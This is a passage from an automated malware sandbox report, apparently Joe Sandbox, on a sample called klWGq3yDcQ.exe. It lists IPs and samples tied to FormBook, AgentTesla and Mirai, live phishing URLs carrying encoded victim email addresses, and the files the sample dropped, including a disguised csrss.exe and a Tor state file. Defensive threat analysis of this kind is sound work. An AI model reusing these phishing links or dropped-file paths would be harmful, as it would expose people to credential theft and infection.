                                                                                                                                                                                                    • 66.45.230.29
                                                                                                                                                                                                    u7owoMHeAY.exeGet hashmaliciousAmadey, Remcos, VidarBrowse
                                                                                                                                                                                                    • 66.45.250.2
                                                                                                                                                                                                    PAEGV8M4pu.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 74.50.84.203
                                                                                                                                                                                                    https://bwspeakars.co/auth/public/?id=google.auth.Adfjguirojs==Jh7dbwJ12io3d4dotaGVscEBrZXQub3JnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 216.219.95.76
                                                                                                                                                                                                    akt-sverka_PDF.exeGet hashmaliciousRMSRemoteAdmin, RedLineBrowse
                                                                                                                                                                                                    • 66.23.226.254
                                                                                                                                                                                                    BUILD.bin.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                                                                                                                    • 66.23.226.254
                                                                                                                                                                                                    UNIFIEDLAYER-AS-1USAUS_9141124-2023.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 162.241.252.161
                                                                                                                                                                                                    https://selligenttier.naylorcampaigns.com/track?type=click&enid=ZWFzPTEmbXNpZD0mYXVpZD0mbWFpbGluZ2lkPTYyNDExMiZtZXNzYWdlaWQ9NjI0MTEyJmRhdGFiYXNlaWQ9NjI0MTEyJnNlcmlhbD0xNjgyODQwNyZlbWFpbGlkPVRpbUBFbGV2YXRlZGNnLmNvbSZ1c2VyaWQ9MjExMTg2JnRhcmdldGlkPSZtbj0mZmw9Jm12aWQ9JmV4dHJhPSYmJg==&&&9999&&&https://vegannightmarket.com/hsvds/UCIfO/amFjb3BvX21vc2NhQHRyZWtmci5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 162.241.120.242
                                                                                                                                                                                                    open-order#456789.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                    • 50.87.139.143
                                                                                                                                                                                                    aMGTc878Pm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 192.185.223.51
                                                                                                                                                                                                    8MlaKaB5fV.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 192.185.223.51
                                                                                                                                                                                                    https://iel.jej.mybluehost.me/rvk/css/net/login.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 50.87.254.15
                                                                                                                                                                                                    REVISE_FDA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                    • 162.241.169.155
                                                                                                                                                                                                    https://events.bizzabo.com/auth/emailAssociatedLogin/verifyTokenAndRedirect?token=S9NcmjZghhHTu-K8Bn2uA9CkNhbMdZVLD_YG9HzIwMWMvvRTd-dklFn2bExx7385&eventGroupId=26969&redirectUrl=https%3A%2F%2Fbaddiebye.com/%2Fnew%2Freview%2Fwhoiop%2F%2F%2F%2FY2VAYWliLmdvdi51aw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 69.49.228.234
                                                                                                                                                                                                    SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 98.131.204.233
                                                                                                                                                                                                    OOtCSoKbT8.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                    • 98.131.204.200
                                                                                                                                                                                                    https://luesa.co.tz/cotz/34567876547643/1536791658/dGltLndyaWdodEBjYWEuY28udWs=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 192.185.28.253
                                                                                                                                                                                                    y1b1M01VF2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 162.144.13.104
                                                                                                                                                                                                    BSuHKTQogWYegWx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 162.241.252.161
                                                                                                                                                                                                    https://www.updatenetflixaccount.com/update.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 50.87.145.150
                                                                                                                                                                                                    Shipment_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                    • 50.87.139.143
                                                                                                                                                                                                    https://updatenetflixaccount.com/update.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 50.87.145.150
                                                                                                                                                                                                    91bf9340-4132-1a39-b40a-d4200e45cd47.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 108.167.181.108
                                                                                                                                                                                                    https://events.bizzabo.com/auth/emailAssociatedLogin/verifyTokenAndRedirect?token=S9NcmjZghhHTu-K8Bn2uA9CkNhbMdZVLD_YG9HzIwMWMvvRTd-dklFn2bExx7385&eventGroupId=26969&redirectUrl=https%3A%2F%2Fluesa%E3%80%82co%E3%80%82tz/uks/34567876547643/1536791658/amFtZXMucmljaGFyZHNvbkBtYWdhaXJwb3J0cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 192.185.28.253
                                                                                                                                                                                                    rRICO0928-2023.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 162.241.252.161
                                                                                                                                                                                                    rCustomerOnDemandNotice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 162.241.252.161

                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    (copy)

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (356), with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4227
                                                                                                                                                                                                    Entropy (8bit):5.302243346969084
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:c7/QxaSLDggEshKm5Fgx0tHxKZwLSl0UausrWVxNl64fPHKkY:4YDggEsYmHgx2G05KVLVPqkY
                                                                                                                                                                                                    MD5:765E24E127075F44F60BBEC82AB85290
                                                                                                                                                                                                    SHA1:0F64AC8072F9FB23CF5BBA0A5366047CA239C65D
                                                                                                                                                                                                    SHA-256:C236F5D3357ADBAA1FE4BCC6537A0E674689CCF3E6EF703D44ED6275C9D33455
                                                                                                                                                                                                    SHA-512:1083EB3A28006F5505F3D90D58916CBB853C4C3138347E14B0D62A114299F6762F3593F114824D7E300BE132F9F3DFBFF9F99596385AD4857D94F893606AECCD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:# Tor state file last generated on 2023-11-26 06:59:58 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 725 1..CircuitBuildTimeBin 775 1..CircuitBuildTimeBin 825 2..CircuitBuildTimeBin 875 1..CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1025 1..CircuitBuildTimeBin 1075 2..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1225 1..CircuitBuildTimeBin 1275 1..CircuitBuildTimeBin 1425 2..CircuitBuildTimeBin 1475 1..CircuitBuildTimeBin 1625 2..CircuitBuildTimeBin 2375 2..CircuitBuildTimeBin 12275 1..Dormant 0..Guard in=default rsa_id=BF93594384A02DE7689C4FD821E2638DA2CD4792 nickname=labaliseridicule sampled_on=2023-11-25T20:14:43 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-11-25T14:22:11 confirmed_idx=1 pb_use_attempts=8.000000 pb_use_successes=8.000000 pb_circ_attempts=10.000000 pb_circ_successes=9.000000 pb_successful_circuits_closed=9.000000..Guard in=default rsa_id=B8D3B9067FAA01EAACBC688

                                                                                                                                                                                                    C:\ProgramData\Drivers\csrss.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1973248
                                                                                                                                                                                                    Entropy (8bit):7.914331766253071
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:T9+v9qBhn3hRk9XkSxV4QFTNXopKJe8FtU+0:5wqBZTk9X7bFTSphIK
                                                                                                                                                                                                    MD5:FE049DDD0FFD2DF34DA564208AFF9CEC
                                                                                                                                                                                                    SHA1:1DF42BAE63A1698B6070B198F9DCEB3AC2B1338E
                                                                                                                                                                                                    SHA-256:AA16EED6ABD2118DF6B0670813AE3B9DAB59B458BDC76222866C9A9FC0FA1409
                                                                                                                                                                                                    SHA-512:B46E677B3366E395A96761C768112ACB01ACFEACC92BC5F2749A923BCBC33E4EE6A1D9F5156CF6E250E217E79111E576F5567EAE2F7EB381FFA2E08162F1FFBC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L......c.................$...8.......a.......@....@..........................P)......1.......................................'..P....p(. ............................................................9..@............................................text...B".......$.................. ..`.data....*...@.......(..............@....rsrc... ....p(......D..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_klWGq3yDcQ.exe_5ab8dffadfd17da166bf44c094a954023413eb5_f6fad5ff_06f03d30-a664-4eef-bb18-74b786096fc7\Report.wer

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.9615339586492504
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:/tBVPWmCL1LtFsAyhnAI7aZPQXIDcQ4c6fcE+cw3akU+HbHgoC5AJee1NIDV9MrG:/jFMXFw0WbkzjN0zzuiFWZ24IO8H
                                                                                                                                                                                                    MD5:AE0405B01DD8D124FCA47215710CF65B
                                                                                                                                                                                                    SHA1:6C512CE015FDE03963DCB71F81AA8B58CEB717A6
                                                                                                                                                                                                    SHA-256:F82DD890B3C5844CF91EE205D6D7997540C54684E2D88DC0410E51F225960600
                                                                                                                                                                                                    SHA-512:217848FF2F5F9EEEF4CD4462FFDD36AC83E46F6211991BA3D5E6FF1C9083ABF9CD27F1E35905ACB0DB7BE3DE4BBE1ACFB89477E8AB86E140847B5459405266C6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.5.4.5.2.0.4.8.2.3.5.6.3.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.5.4.5.2.0.4.9.0.7.9.3.8.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.f.0.3.d.3.0.-.a.6.6.4.-.4.e.e.f.-.b.b.1.8.-.7.4.b.7.8.6.0.9.6.f.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.7.0.1.b.b.5.-.4.9.2.9.-.4.c.5.7.-.b.f.1.9.-.5.6.3.6.8.8.9.8.2.9.2.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.l.W.G.q.3.y.D.c.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.6.0.-.0.0.0.1.-.0.0.1.4.-.c.4.d.a.-.9.6.9.f.2.d.2.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.3.0.1.7.3.b.7.a.e.1.2.d.e.9.7.2.9.7.3.1.7.7.3.0.b.1.c.f.0.a.0.0.0.0.f.f.f.f.!.0.0.0.0.1.d.f.4.2.b.a.e.6.3.a.1.6.9.8.b.6.0.7.0.b.1.9.8.f.9.d.c.e.b.3.a.c.2.b.1.3.3.8.e.!.k.l.W.G.q.3.y.D.c.Q...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_klWGq3yDcQ.exe_5ab8dffadfd17da166bf44c094a954023413eb5_f6fad5ff_2af4128a-de8f-4495-8f78-94a7c68274e6\Report.wer

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.9615709744454661
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:73FIkLPmCL1LtEsAyhnAI7aZPQXIDcQNc6xBJcELAcw3LckU+HbHgoC5AJee1NIM:TdtXEw0zDJ2FjN0zzuiFxZ24IO8H
                                                                                                                                                                                                    MD5:73253E53D01C8A4EAD7987A3DA42C289
                                                                                                                                                                                                    SHA1:5F75550005032DE37B0255655082BA031B3C54D8
                                                                                                                                                                                                    SHA-256:C3B5F984D08759CE17A4B1CA2166CEB2C73706B0C00A72B2A8C92CAE1BEBA089
                                                                                                                                                                                                    SHA-512:33D7E0843ACDE449149FFB2598F0AAF3950A64BB5D281708653E451BD650CB459CF034651C795E7675B03E10D1A72E59EAF2E5C5BF6A4D1109817FF9EE4B4579
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.5.4.5.2.0.0.7.5.0.9.0.2.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.5.4.5.2.0.1.4.9.3.0.8.9.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.f.4.1.2.8.a.-.d.e.8.f.-.4.4.9.5.-.8.f.7.8.-.9.4.a.7.c.6.8.2.7.4.e.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.d.e.e.7.f.1.-.c.e.7.4.-.4.7.b.a.-.a.4.7.2.-.e.7.1.8.e.2.1.3.5.5.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.l.W.G.q.3.y.D.c.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.6.0.-.0.0.0.1.-.0.0.1.4.-.c.4.d.a.-.9.6.9.f.2.d.2.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.3.0.1.7.3.b.7.a.e.1.2.d.e.9.7.2.9.7.3.1.7.7.3.0.b.1.c.f.0.a.0.0.0.0.f.f.f.f.!.0.0.0.0.1.d.f.4.2.b.a.e.6.3.a.1.6.9.8.b.6.0.7.0.b.1.9.8.f.9.d.c.e.b.3.a.c.2.b.1.3.3.8.e.!.k.l.W.G.q.3.y.D.c.Q...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_klWGq3yDcQ.exe_5ab8dffadfd17da166bf44c094a954023413eb5_f6fad5ff_2fbba0c3-0571-42f0-b073-3c1e8e258d51\Report.wer

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.9615611242756577
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:gW7FiWmCL1Ltu3sAyhnAI7aZPQXIDcQxc6scEqcw3f7kU+HbHgoC5AJee1NIDV9g:T0MXu3w0PowD2jN0zzuiFxZ24IO8H
                                                                                                                                                                                                    MD5:025E9E846233235DF56D02B48C198B9C
                                                                                                                                                                                                    SHA1:7941C3FD79ECB38A13A5BEB86618FA4884C9CB3E
                                                                                                                                                                                                    SHA-256:E9A53BDA12A0290A990F671045FCD66E845BEDE5358E0984BB0452995AAB2E1A
                                                                                                                                                                                                    SHA-512:5C878A64CC4E1A7D936053BFDFDA1FA13BF49974151A429662B870D15CC4454C1B78231BAD2043AEE5B32A1C69B01580D1DD377B41E7A188E6640C051FAC643A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.5.4.5.1.9.8.5.8.7.5.1.5.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.5.4.5.1.9.9.4.3.7.5.1.4.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.b.b.a.0.c.3.-.0.5.7.1.-.4.2.f.0.-.b.0.7.3.-.3.c.1.e.8.e.2.5.8.d.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.2.0.1.f.6.6.-.1.9.6.a.-.4.8.3.a.-.8.a.e.3.-.0.7.a.4.6.7.d.c.5.e.d.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.l.W.G.q.3.y.D.c.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.6.0.-.0.0.0.1.-.0.0.1.4.-.c.4.d.a.-.9.6.9.f.2.d.2.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.3.0.1.7.3.b.7.a.e.1.2.d.e.9.7.2.9.7.3.1.7.7.3.0.b.1.c.f.0.a.0.0.0.0.f.f.f.f.!.0.0.0.0.1.d.f.4.2.b.a.e.6.3.a.1.6.9.8.b.6.0.7.0.b.1.9.8.f.9.d.c.e.b.3.a.c.2.b.1.3.3.8.e.!.k.l.W.G.q.3.y.D.c.Q...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER50D1.tmp.dmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Sun Nov 26 06:00:48 2023, 0x1205a4 type
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):372510
                                                                                                                                                                                                    Entropy (8bit):2.7210066552598007
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:Z7P2Km8FMd5Nws0WV756lT68npw1OJ57jyzpIbm4/odUPrPTV1bQ0nWxN0J4J:ZbjWdp0Q756lTtniObtucWxzJ
                                                                                                                                                                                                    MD5:5095401518006B65E67C4179407AAD12
                                                                                                                                                                                                    SHA1:879DC5286CC57A249AA170DA1FAEF914D8627630
                                                                                                                                                                                                    SHA-256:54A49C8D6594E114B682690B7E342B93993E43BCA57A83C09E23D14E3847D160
                                                                                                                                                                                                    SHA-512:76E97541E1CFEAE2A91F531D411D9C3857FFAA5E6DEFC69D92802D407E8C32245784287F3EFAB67977A70B1379DBD0C72D8A9F88C00D9FA67A946E7505AE8129
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:MDMP..a..... .........be............4...............H.......,...<.......$...(+..........`.......8...........T...........................h...........T ..............................................................................eJ....... ......GenuineIntel............T.......`.....be.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER52E6.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6340
                                                                                                                                                                                                    Entropy (8bit):3.7037426526302784
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJLgA6OvEdYY3pDR489bHmsf6tm:R6lXJT6OEYYrFHFfZ
                                                                                                                                                                                                    MD5:5584B70F1C9208BFD632160DB100F2E9
                                                                                                                                                                                                    SHA1:5B2D16D2FC126742BE07BA9BBA0FB3BF01961C21
                                                                                                                                                                                                    SHA-256:BD48EBFC2872ECF5D2679DFE1E46F8C18C1E89BAF89461F2747B2214C606DB0D
                                                                                                                                                                                                    SHA-512:17F333082CAA1422EC94943CB6103A1D8ADF279CB23DF5B3F44779CEC42939CD4CF62894F0DFCCD59E27FB32AF0EBC0567B99829BEBF6323AE2ADFACFD2ADFCC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.4.0.<./.P.i.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5316.tmp.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4578
                                                                                                                                                                                                    Entropy (8bit):4.471912993855923
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsqJg77aI93cWpW8VYAYm8M4Js/vL/PjFkj+q8T9JDGiHozziUCDUydd:uIjf4I75V7VsJMTuj0JPIzxCwydd
                                                                                                                                                                                                    MD5:2492584B6DA3C6272407B645E32B91DF
                                                                                                                                                                                                    SHA1:6D14819ECDB29E52E26D29AAFEF17E9576D11F46
                                                                                                                                                                                                    SHA-256:9C023EFB5422DA65803756411A752176EC866446A8162499640FAF6161831476
                                                                                                                                                                                                    SHA-512:2915D94BD34D51CC4588685A9367DB908366FC19904DFED18B9FFEA74747323D27DA6B97459528778FFDD6314CE14749CC76159646C30413A761CB599D4E4218
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="77583" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D3A.tmp.dmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Sun Nov 26 05:59:48 2023, 0x1205a4 type
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4367457
                                                                                                                                                                                                    Entropy (8bit):2.28524546066451
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:VFwXh/1NRWr0hn8aJK9rWPdPW4F672wVlXYHVCTN5Wd+4DMjwWStIif/fuQT7PhV:VFw37/FnTilPAO
                                                                                                                                                                                                    MD5:91CE806E1EDB9DA41F9D83BE3AB96E48
                                                                                                                                                                                                    SHA1:7D568CBE73A75C5F80B82F5E3641CF15177A8AA7
                                                                                                                                                                                                    SHA-256:414EEC5E653D5338A21368FEF25873A1CE1772B88968DC2B7E3C068D392AEDC3
                                                                                                                                                                                                    SHA-512:E7E6B796ADFA2574E7D3C2D306B317FDDECE453A794CE607B70F73F55F2A218AD7F838A9B6E0D51EE838A05C3DD97282F821DFA61C55D9399F7144974B12EF87
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:MDMP..a..... .........be.............l...............s......,...........................`.......8...........T.................?.........8...........$...............................................................................eJ..............GenuineIntel............T.......`.....be.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C4C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6336
                                                                                                                                                                                                    Entropy (8bit):3.7233934377221938
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:RSIU6o7wVetbqgb6TYHdO8zNzAgaM4U089bKmsffNum:R6l7wVeJLb6TYY8npr089bKmsffNum
                                                                                                                                                                                                    MD5:2FCC976BC868605552F6438FD8498B40
                                                                                                                                                                                                    SHA1:4225C0D195BE8C5A67C157375853625B513CA443
                                                                                                                                                                                                    SHA-256:82029DE94657E991C821B2966E12DDB7FD38D1E67FAA9763F8AAD009C5F7C55E
                                                                                                                                                                                                    SHA-512:A048149F758C2FCDEDE95C3A47D8DE9900EBFBD5F7F7016A3A3AD53D2E1663BF0F7128910D9391512C9F69B32DC7325AC0FEFC130063DE1F867E62E214EAE903
                                                                                                                                                                                                    Malicious:false
